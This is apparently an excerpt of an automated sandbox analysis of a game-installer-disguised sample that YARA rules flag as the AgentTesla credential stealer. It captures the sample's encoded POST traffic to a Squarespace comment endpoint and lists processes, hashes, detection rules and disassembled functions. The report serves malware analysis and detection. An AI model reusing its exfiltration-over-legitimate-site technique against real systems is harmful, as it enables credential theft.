2024-09-01 20:05:03 UTC	16306	OUT	Data Raw: 66 61 4c 42 65 71 4d 33 43 67 34 34 56 6a 45 55 4a 4d 47 4d 43 33 45 36 74 46 31 30 75 69 43 34 4d 6f 35 74 78 4f 52 42 6d 32 78 74 49 70 35 4f 6c 66 4c 71 50 58 53 41 74 36 79 76 34 34 71 75 71 46 49 5a 59 68 46 6f 65 73 59 39 56 75 2f 4c 64 49 62 69 53 30 57 44 36 79 6d 33 42 59 74 49 57 2f 4d 47 38 4b 59 46 79 59 75 49 30 46 63 78 48 44 73 69 41 6b 73 66 42 4f 4b 48 77 72 45 25 32 42 71 6a 6c 47 45 79 42 4b 43 4a 52 74 50 74 61 43 36 56 59 64 35 36 61 70 45 61 4d 50 53 46 59 7a 67 67 4f 51 6a 77 68 42 70 36 77 55 30 44 33 4a 6f 46 2f 67 62 37 48 6d 2f 49 50 56 35 72 79 35 50 7a 4b 52 46 44 71 43 64 75 4d 38 78 52 54 48 39 79 6b 34 69 31 65 30 38 46 75 62 6a 71 6e 76 4e 53 58 6e 71 79 47 34 51 4c 69 47 70 33 6a 52 39 5a 6d 63 58 67 32 37 59 47 36 52 7a Data Ascii: faLBeqM3Cg44VjEUJMGMC3E6tF10uiC4Mo5txORBm2xtIp5OlfLqPXSAt6yv44quqFIZYhFoesY9Vu/LdIbiS0WD6ym3BYtIW/MG8KYFyYuI0FcxHDsiAksfBOKHwrE%2BqjlGEyBKCJRtPtaC6VYd56apEaMPSFYzggOQjwhBp6wU0D3JoF/gb7Hm/IPV5ry5PzKRFDqCduM8xRTH9yk4i1e08FubjqnvNSXnqyG4QLiGp3jR9ZmcXg27YG6Rz
2024-09-01 20:05:03 UTC	1	OUT	Data Raw: 72 Data Ascii: r
2024-09-01 20:05:03 UTC	16306	OUT	Data Raw: 47 32 4f 6d 6f 5a 2f 43 67 30 37 61 56 39 43 48 31 44 77 77 41 56 47 41 50 6a 78 48 54 62 32 76 76 42 68 63 63 46 6d 6e 37 7a 4e 6e 43 78 38 6b 49 55 57 62 49 62 67 6a 7a 2f 64 78 67 6f 70 54 58 6c 7a 35 57 38 6f 75 4c 38 25 32 42 78 58 65 63 71 64 36 48 61 49 70 37 4b 75 61 7a 47 5a 57 47 71 6e 78 74 63 30 32 59 6d 6b 64 37 59 34 36 33 65 71 47 37 39 79 76 52 77 61 55 48 4f 63 45 6a 50 4b 44 54 65 2f 53 78 64 59 6c 51 32 38 73 56 57 46 41 59 55 72 5a 35 4a 53 4e 38 73 62 43 78 4c 31 62 66 51 54 51 6d 74 33 6c 4e 36 25 32 42 44 5a 41 71 78 67 39 2f 6a 6c 53 67 34 78 71 47 71 62 4b 42 33 69 74 59 6d 4d 74 42 71 47 64 66 64 78 72 63 59 53 72 47 61 50 67 6b 66 2f 49 79 7a 67 25 32 42 57 37 41 4b 73 52 42 4d 64 31 30 64 4a 55 77 33 4e 2f 32 6c 6b 57 66 49 44 Data Ascii: G2OmoZ/Cg07aV9CH1DwwAVGAPjxHTb2vvBhccFmn7zNnCx8kIUWbIbgjz/dxgopTXlz5W8ouL8%2BxXecqd6HaIp7KuazGZWGqnxtc02Ymkd7Y463eqG79yvRwaUHOcEjPKDTe/SxdYlQ28sVWFAYUrZ5JSN8sbCxL1bfQTQmt3lN6%2BDZAqxg9/jlSg4xqGqbKB3itYmMtBqGdfdxrcYSrGaPgkf/Iyzg%2BW7AKsRBMd10dJUw3N/2lkWfID
2024-09-01 20:05:03 UTC	1	OUT	Data Raw: 69 Data Ascii: i
2024-09-01 20:05:03 UTC	16306	OUT	Data Raw: 56 77 59 4e 4b 6f 4b 4d 59 68 57 38 47 72 39 62 4c 44 45 77 64 7a 71 38 6b 62 64 63 4c 55 30 4d 6a 71 59 42 77 73 36 49 47 79 6d 6f 78 74 62 75 68 76 7a 65 4f 36 53 72 66 53 2f 79 53 77 25 32 42 4d 55 2f 59 39 31 46 46 31 66 50 70 46 67 76 68 37 37 6a 68 39 62 67 66 4c 43 45 31 43 30 41 4c 4d 64 61 4f 4d 33 41 63 39 4e 46 70 66 46 61 50 4f 4d 48 59 54 42 53 77 38 75 2f 72 74 31 48 32 6f 76 78 56 4d 4f 55 6c 69 2f 33 4b 72 4d 58 43 78 25 32 42 6d 33 39 6f 36 6c 78 51 68 4c 43 25 32 42 64 48 51 55 34 6b 32 41 44 62 4e 77 49 4a 54 58 57 48 42 72 52 37 75 7a 4c 78 4d 51 6e 78 6b 52 79 34 70 67 45 4b 39 63 48 58 58 33 4e 4a 31 6f 6b 41 46 31 35 39 45 43 61 38 63 5a 67 4b 38 4b 4d 74 4f 64 76 31 47 76 65 4f 7a 6d 31 6e 34 6c 4f 4f 68 25 32 42 6b 34 42 45 71 46 Data Ascii: VwYNKoKMYhW8Gr9bLDEwdzq8kbdcLU0MjqYBws6IGymoxtbuhvzeO6SrfS/ySw%2BMU/Y91FF1fPpFgvh77jh9bgfLCE1C0ALMdaOM3Ac9NFpfFaPOMHYTBSw8u/rt1H2ovxVMOUli/3KrMXCx%2Bm39o6lxQhLC%2BdHQU4k2ADbNwIJTXWHBrR7uzLxMQnxkRy4pgEK9cHXX3NJ1okAF159ECa8cZgK8KMtOdv1GveOzm1n4lOOh%2Bk4BEqF
2024-09-01 20:05:03 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:05:03 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BZu-19OEoJR_YmQ2NzMxYzZmZjg0YTlhOWU5YmQ0MjBhYWRkY2Fi; Path=/; Secure Set-Cookie: crumb=BUpBBYyKP2gIZTExMTI3Y2M1NWFmMGFkNzI5MzczMmE5YWEyMjY3; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: y1vBXpaq/McOjfFEx Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BUpBBYyKP2gIZTExMTI3Y2M1NWFmMGFkNzI5MzczMmE5YWEyMjY3"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
147	192.168.2.5	49871	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:05:03 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:05:03 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:05:03 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:05:03 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:05:03 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:05:03 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=Bc36uXEentXcZWVjNWQ4MWQ3YjBmN2JlOGQ0ZGMxOTY4OGRmNDIz; Path=/; Secure Set-Cookie: crumb=BVzLR_Qk0lB8MGZmZTEzYTM2NjBmNjU5NjM2MGY0MzRhMDY3NzA5; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: Yb41pd4P/Y5zIEbg5 Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BVzLR_Qk0lB8MGZmZTEzYTM2NjBmNjU5NjM2MGY0MzRhMDY3NzA5"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
148	192.168.2.5	49873	198.185.159.177	443	5952	C:\Users\user\AppData\Roaming\nefgd\nefgd.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:05:03 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:05:03 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:05:03 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:05:03 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:05:04 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:05:03 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BYh3AaQv3YyKN2NhMjVlYzkzYzMxYzE2OWUzN2FjYWVkY2I3ZjNh; Path=/; Secure Set-Cookie: crumb=BTIWmMjwor9tZThhZGEyODM1NjFmZDJkMGFmYjliYjI2MDEyZDY0; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: OCA3hYrk/IEy1yiPg Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BTIWmMjwor9tZThhZGEyODM1NjFmZDJkMGFmYjliYjI2MDEyZDY0"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
149	192.168.2.5	49874	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:05:03 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:05:03 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:05:03 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:05:03 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:05:04 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:05:03 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BTzWRTPodLCkN2M2NWZlMzhjN2U3N2IwY2Q3MjQzZTk3ZDY3MTBm; Path=/; Secure Set-Cookie: crumb=BYTZ1sIFuLtaYWMxOTkwMzk4OGI0MzMxYjE0ZDJjZDU4ZTUzNmU4; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: kJsOF45a/q79YbLCm Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BYTZ1sIFuLtaYWMxOTkwMzk4OGI0MzMxYjE0ZDJjZDU4ZTUzNmU4"}

Target ID:	0
Start time:	16:02:57
Start date:	01/09/2024
Path:	C:\Users\user\Desktop\Overwatch-Installer.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Overwatch-Installer.exe"
Imagebase:	0xa90000
File size:	741'888 bytes
MD5 hash:	CA43BDBD4AAC599EDC0E76CCDE512F8A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.2009514442.0000000000A92000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000000.2009514442.0000000000A92000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	16:03:25
Start date:	01/09/2024
Path:	C:\Users\user\AppData\Roaming\nefgd\nefgd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\nefgd\nefgd.exe"
Imagebase:	0xfa0000
File size:	741'888 bytes
MD5 hash:	CA43BDBD4AAC599EDC0E76CCDE512F8A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4464189616.0000000003631000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe, Author: Joe Security Rule: AgentTesla_1, Description: AgentTesla Payload, Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe, Author: kevoreilly Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe, Author: ditekSHen Rule: MALWARE_Win_AgentTeslaV2, Description: AgenetTesla Type 2 Keylogger payload, Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe, Author: ditekSHen Rule: MALWARE_Win_AgentTeslaV3, Description: AgentTeslaV3 infostealer payload, Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 68%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	16:03:34
Start date:	01/09/2024
Path:	C:\Users\user\AppData\Roaming\nefgd\nefgd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\nefgd\nefgd.exe"
Imagebase:	0x410000
File size:	741'888 bytes
MD5 hash:	CA43BDBD4AAC599EDC0E76CCDE512F8A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	16:06:50
Start date:	01/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
Wow64 process (32bit):	true
Commandline:	dw20.exe -x -s 9900
Imagebase:	0x10000000
File size:	36'264 bytes
MD5 hash:	89106D4D0BA99F770EAFE946EA81BB65
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	17.5%
Dynamic/Decrypted Code Coverage:	85%
Signature Coverage:	9%
Total number of Nodes:	167
Total number of Limit Nodes:	10

Executed Functions

Function 052F3E4F Relevance: 13.0, APIs: 3, Instructions: 8469COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4505713322.00000000052F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_52f0000_Overwatch-Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f31ffe7069287865e45f32eaac9898649d6ef3c757ae2995f5f4c8dd2597cca2
Instruction ID: f42efcd3660058ac5f4544ffebd1805014db2bdb6de468b7145c3471f1bf9168
Opcode Fuzzy Hash: f31ffe7069287865e45f32eaac9898649d6ef3c757ae2995f5f4c8dd2597cca2
Instruction Fuzzy Hash: 8AF33A34A042149FCB68DF65D954BAEB7F2EF88204F1081A9D50EA7794DB39ADC6CF40

Function 06705550 Relevance: 6.2, Strings: 2, Instructions: 3659COMMON

Download Yara Rule

Strings

d, xrefs: 06706032
d, xrefs: 06706018

Memory Dump Source

Source File: 00000000.00000002.4513229338.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6700000_Overwatch-Installer.jbxd

Similarity

API ID:
String ID: d$d
API String ID: 0-195624457
Opcode ID: 089d51aa1bb7255193f44a5764b305ee8235a0dcf387c7035c626702c39a9537
Instruction ID: adbd6d8c1c7eb6f4c6162f9941f76cd8cbc116e4a5d68b2166e89b69f3cfaff0
Opcode Fuzzy Hash: 089d51aa1bb7255193f44a5764b305ee8235a0dcf387c7035c626702c39a9537
Instruction Fuzzy Hash: F2731675D00A299FEBA5CF68C844A89F7F2BF89304F0580E5D90CAB261D771AE85CF51

Function 052F0F78 Relevance: 2.4, APIs: 1, Instructions: 923COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 052F117C

Memory Dump Source

Source File: 00000000.00000002.4505713322.00000000052F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_52f0000_Overwatch-Installer.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 62fd526201731d34107571106a0b784aca32fae42af739d5ad6c29daa88cbae6
Instruction ID: 1f37e347d3e9b81ef44f86bb289b66a768536b244b83815187b307f25e9b032a
Opcode Fuzzy Hash: 62fd526201731d34107571106a0b784aca32fae42af739d5ad6c29daa88cbae6
Instruction Fuzzy Hash: 52624630B042018FCB18EB79D5547ADB7E3AF89208F548079C616AB795DF39DC8ACB91

Function 052F0F68 Relevance: 2.2, APIs: 1, Instructions: 714COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4505713322.00000000052F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_52f0000_Overwatch-Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66c9afe3a54abb8504de9316643b77be8368f9ec8e385dd23a7718b5dc561c0a
Instruction ID: ccd01fc68f24370802c8b2f2bbad3c02c94ec29995645d09adbec4cdbb11b08b
Opcode Fuzzy Hash: 66c9afe3a54abb8504de9316643b77be8368f9ec8e385dd23a7718b5dc561c0a
Instruction Fuzzy Hash: EA425730B042118FDB1CAB39D9547ADB6A3AFC9208F548078C616AB7D5DF39DC8AC791

Function 052F1D68 Relevance: 1.6, APIs: 1, Instructions: 128
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 052F1E71

Memory Dump Source

Source File: 00000000.00000002.4505713322.00000000052F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_52f0000_Overwatch-Installer.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d54b8c0f8d8cb6015f3d129cba1b28cf3a90d1ac4d549d61bcd054e13919e04d
Instruction ID: 17b54e56a50a2379032334c52b775d12a65572c02bd52a40e4fb3ab6c6b648d8
Opcode Fuzzy Hash: d54b8c0f8d8cb6015f3d129cba1b28cf3a90d1ac4d549d61bcd054e13919e04d
Instruction Fuzzy Hash: D7417A70F24300EFC728DB75E28166EB7A2FF89704B60426ED61687B54D736A895CB50

Function 05BF2417 Relevance: 1.6, APIs: 1, Instructions: 75COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 05BF2497

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: 6b906dc7c4eb2ea7e65633d5d5b0b558d703955cb937d5770c42e69ddc398d52
Instruction ID: fa8d927e62b40ede4d5b9b7425080b4db29333b1f855990840845e1841a08cc0
Opcode Fuzzy Hash: 6b906dc7c4eb2ea7e65633d5d5b0b558d703955cb937d5770c42e69ddc398d52
Instruction Fuzzy Hash: 88219F755097849FDB128F25DC44B62BFF8FF06310F0884DAEA858B563D271E918DB62

Function 05BF2D57 Relevance: 1.6, APIs: 1, Instructions: 63nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 05BF2DCD

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: c25ceef2e908b0d9fe4b06fef96648725a516b93fbc82ca206d4ef868f8a4512
Instruction ID: 9a43636ceb25ba36ba192ef0c3b03fff50ff66aadcd93bafc29eda0c0454ce66
Opcode Fuzzy Hash: c25ceef2e908b0d9fe4b06fef96648725a516b93fbc82ca206d4ef868f8a4512
Instruction Fuzzy Hash: CB219A754093C09FDB138F21DC55AA2FFB0EF07220F0984DAE9C44B163D265A94DDB62

Function 05BF244E Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 05BF2497

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: c5f127d1ba2e63faa173f18acef48bfa77907415341ba763aaada2ff2b09919d
Instruction ID: 6b78809144ecaac0fa309f87dac2b381c3b30118d1aaadeb15883b8093978b5a
Opcode Fuzzy Hash: c5f127d1ba2e63faa173f18acef48bfa77907415341ba763aaada2ff2b09919d
Instruction Fuzzy Hash: B7115A795042449FEB20CF55DD84B66FBE8FF04320F0884AAEE8A8B652D375E458DB61

Function 05BF6B52 Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?,DB04A2A7,00000000,?,?,?,?,?,?,?,?,6CAA3C58), ref: 05BF6B84

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 8fad88cd460933231f1f6d25ca0f14cae9b9e2440222b06fb438b4377f30de56
Instruction ID: 90653c9bfa11d49243f42524bb3c949f5e13c50ebd97e1260d3febd1b592dd74
Opcode Fuzzy Hash: 8fad88cd460933231f1f6d25ca0f14cae9b9e2440222b06fb438b4377f30de56
Instruction Fuzzy Hash: 9101A9719042449FDB10CF55DA86B62FBE4EF04324F08C4EADE898F342D379A448CBA2

Function 05BF2D92 Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 05BF2DCD

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: e10f4e45076bd2863a29ac6aab2db6793b7eef1988cbd30d40e2ab53218808f6
Instruction ID: 79f7d7f4b48b306335a3a3522f559930c096faa5c5ad1156e9511c6b5cc4ad24
Opcode Fuzzy Hash: e10f4e45076bd2863a29ac6aab2db6793b7eef1988cbd30d40e2ab53218808f6
Instruction Fuzzy Hash: 480178394006449FDB20CF45D985B62FBA4FF08620F08809ADE894B652C375A45DDB62

Function 06874120 Relevance: .5, Instructions: 521COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4513421688.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6870000_Overwatch-Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
